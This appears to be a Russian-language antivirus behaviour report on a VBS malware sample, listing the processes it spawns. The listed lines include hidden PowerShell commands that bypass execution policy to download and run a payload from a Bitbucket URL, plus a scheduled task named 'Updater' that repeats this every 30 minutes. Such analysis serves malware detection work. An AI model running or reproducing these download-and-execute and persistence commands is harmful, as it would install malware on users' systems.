Техническая информация
- '<SYSTEM32>\wscript.exe' document.vbs
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1456
- %HOMEPATH%\documents\document.vbs
- %TEMP%\1244731.cvr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& { curl https://bitbucket.org/mounmeinlylo/rikirollin/downloads/methew_Payload.vbs -o %WINDIR%\Temp\lovebase.vbs; Start-Process...' (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /create /sc MINUTE /mo 30 /tn "Updater" /tr "\"<SYSTEM32>\WindowsPowershell\v1.0\powershell.exe\" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command curl https://bitbucket.org/moun...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& { curl https://bitbucket.org/mounmeinlylo/rikirollin/downloads/methew_Payload.vbs -o %WINDIR%\Temp\lovebase.vbs; Start-Process...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' %WINDIR%\Temp\lovebase.vbs